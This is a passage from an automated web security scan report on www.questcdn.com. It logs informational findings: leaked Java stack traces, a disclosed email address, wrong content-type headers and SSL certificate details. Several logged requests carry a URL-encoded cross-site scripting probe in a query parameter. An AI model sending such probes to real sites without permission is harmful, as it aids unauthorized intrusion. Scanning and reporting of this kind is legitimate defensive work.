Date: Tue, 01 Mar 2011 23:39:01 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/699697036116497425; Expires=Thu, 03-Mar-2011 23:39:01 GMT; Path=/questcdn
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 2166
Content-Type: text/html;charset=utf-8

<font color="#FF0000">2011/03/01 17:39:01.536 [ 1] (TP-Processor2006) Problem with service<pre><a href="http://java.sun.com/products/jdk/1.2/docs/api/java/lang/NullPointerException.html" target="new">java.lang.NullPointerException</a>
...[SNIP]...

5.2. http://www.questcdn.com/questcdn/setTab/projects/MyProjects/my_projects.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.questcdn.com
Path:   /questcdn/setTab/projects/MyProjects/my_projects.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /questcdn/setTab/projects/MyProjects/my_projects.html?current_tab=projects&current_sub_tab=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000201)%3C/script%3E HTTP/1.1
Host: www.questcdn.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sessionIdentifier=/699697036116497425

Response

HTTP/1.1 200 OK
Date: Tue, 01 Mar 2011 23:38:50 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/699697036116497425; Expires=Thu, 03-Mar-2011 23:38:50 GMT; Path=/questcdn
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 29451
Content-Type: text/html;charset=utf-8

<!--$Header: planholder_list.html, 11/24/2009, Eric Nelsen$-->
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="content-type" content="text/html;charset=iso-8859-1"/>

       <title>
...[SNIP]...
<pre><a href="http://java.sun.com/products/jdk/1.2/docs/api/java/sql/SQLException.html" target="new">java.sql.SQLException</a>
...[SNIP]...
<pre><a href="http://java.sun.com/products/jdk/1.2/docs/api/java/sql/SQLException.html" target="new">java.sql.SQLException</a>
...[SNIP]...

5.3. http://www.questcdn.com/questcdn/setTab/projects/MyProjects/my_projects.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.questcdn.com
Path:   /questcdn/setTab/projects/MyProjects/my_projects.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /questcdn/setTab/projects/MyProjects/my_projects.html?current_tab=projects&current_sub_tab=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000201)%3C/script%3E HTTP/1.1
Host: www.questcdn.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sessionIdentifier=/699697036116497425

Response

HTTP/1.1 200 OK
Date: Tue, 01 Mar 2011 23:44:51 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/699697036116497425; Expires=Thu, 03-Mar-2011 23:44:51 GMT; Path=/questcdn
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 2295
Content-Type: text/html;charset=utf-8

<font color="#FF0000">2011/03/01 17:44:51.316 [ 1] (TP-Processor1788) Problem with service<pre><a href="http://java.sun.com/products/jdk/1.2/docs/api/java/lang/NullPointerException.html" target="new">java.lang.NullPointerException</a>
...[SNIP]...

6. Email addresses disclosed  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.questcdn.com
Path:   /questcdn/subscribe/sub_form.html

Issue detail

The following email address was disclosed in the response:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).

Request

GET /questcdn/subscribe/sub_form.html?root_page=true HTTP/1.1
Host: www.questcdn.com
Connection: keep-alive
Referer: http://questcdn.com/questcdn/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 01 Mar 2011 23:35:12 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/8756590032920786406; Expires=Thu, 03-Mar-2011 23:35:12 GMT; Path=/questcdn
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 66153
Keep-Alive: timeout=15000, max=300
Connection: Keep-Alive
Content-Type: text/html;charset=utf-8

<!--$Header: c:/questcdn/cvs/quest-src/www/subscribe/sub_form.html,v 1.1.1.1 2005/01/28 18:06:37 rstruthers Exp $-->
<html>

   <head>
       <meta http-equiv="content-type" content="text/html;charset=iso-88
...[SNIP]...
<a href="mailto:info@questcdn.com">
...[SNIP]...

7. Content type incorrectly stated  previous  next
There are 4 instances of this issue:

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.


7.1. http://www.questcdn.com/questcdn/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.questcdn.com
Path:   /questcdn/

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /questcdn/ HTTP/1.1
Host: www.questcdn.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sessionIdentifier=/699697036116497425

Response

HTTP/1.1 200 OK
Date: Tue, 01 Mar 2011 23:45:15 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/699697036116497425; Expires=Thu, 03-Mar-2011 23:45:15 GMT; Path=/questcdn
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 2295
Content-Type: text/html;charset=utf-8

<font color="#FF0000">2011/03/01 17:45:15.296 [ 1] (TP-Processor2021) Problem with service<pre><a href="http://java.sun.com/products/jdk/1.2/docs/api/java/lang/NullPointerException.html" target="new">
...[SNIP]...

7.2. http://www.questcdn.com/questcdn/action/myProjectConnector  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.questcdn.com
Path:   /questcdn/action/myProjectConnector

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /questcdn/action/myProjectConnector?user_no=&member_no=&allMember=&category=1 HTTP/1.1
Host: www.questcdn.com
Proxy-Connection: keep-alive
Referer: http://www.questcdn.com/questcdn/setTab/projects/MyProjects/my_projects.html?current_tab=projects&current_sub_tab=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000201)%3C/script%3E
X-Requested-With: XMLHttpRequest
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sessionIdentifier=/699697036116497425

Response

HTTP/1.1 200 OK
Date: Tue, 01 Mar 2011 23:39:01 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/699697036116497425; Expires=Thu, 03-Mar-2011 23:39:01 GMT; Path=/questcdn
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 2166
Content-Type: text/html;charset=utf-8

<font color="#FF0000">2011/03/01 17:39:01.536 [ 1] (TP-Processor2006) Problem with service<pre><a href="http://java.sun.com/products/jdk/1.2/docs/api/java/lang/NullPointerException.html" target="new">
...[SNIP]...

7.3. http://www.questcdn.com/questcdn/setTab/projects/MyProjects/my_projects.html  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.questcdn.com
Path:   /questcdn/setTab/projects/MyProjects/my_projects.html

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /questcdn/setTab/projects/MyProjects/my_projects.html?current_tab=projects&current_sub_tab=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000201)%3C/script%3E HTTP/1.1
Host: www.questcdn.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sessionIdentifier=/699697036116497425

Response

HTTP/1.1 200 OK
Date: Tue, 01 Mar 2011 23:44:51 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/699697036116497425; Expires=Thu, 03-Mar-2011 23:44:51 GMT; Path=/questcdn
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 2295
Content-Type: text/html;charset=utf-8

<font color="#FF0000">2011/03/01 17:44:51.316 [ 1] (TP-Processor1788) Problem with service<pre><a href="http://java.sun.com/products/jdk/1.2/docs/api/java/lang/NullPointerException.html" target="new">
...[SNIP]...

7.4. https://www.questcdn.com/questcdn/  previous

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www.questcdn.com
Path:   /questcdn/

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /questcdn/ HTTP/1.1
Host: www.questcdn.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sessionIdentifier=/699697036116497425

Response

HTTP/1.1 200 OK
Date: Wed, 02 Mar 2011 01:04:15 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/699697036116497425; Expires=Fri, 04-Mar-2011 01:04:15 GMT; Path=/questcdn
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 2295
Keep-Alive: timeout=15000, max=300
Connection: Keep-Alive
Content-Type: text/html;charset=utf-8

<font color="#FF0000">2011/03/01 19:04:15.549 [ 1] (TP-Processor1667) Problem with service<pre><a href="http://java.sun.com/products/jdk/1.2/docs/api/java/lang/NullPointerException.html" target="new">
...[SNIP]...

8. SSL certificate  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.questcdn.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.questcdn.com
Issued by:  Thawte Premium Server CA
Valid from:  Wed Oct 08 19:00:00 CDT 2008
Valid to:  Tue Nov 01 18:59:59 CDT 2011

Certificate chain #1

Issued to:  Thawte Premium Server CA
Issued by:  Thawte Premium Server CA
Valid from:  Wed Jul 31 19:00:00 CDT 1996
Valid to:  Fri Jan 01 17:59:59 CST 2021

Issue background

SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.

It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.

Report generated by XSS.CX at Sun Mar 06 10:21:32 CST 2011.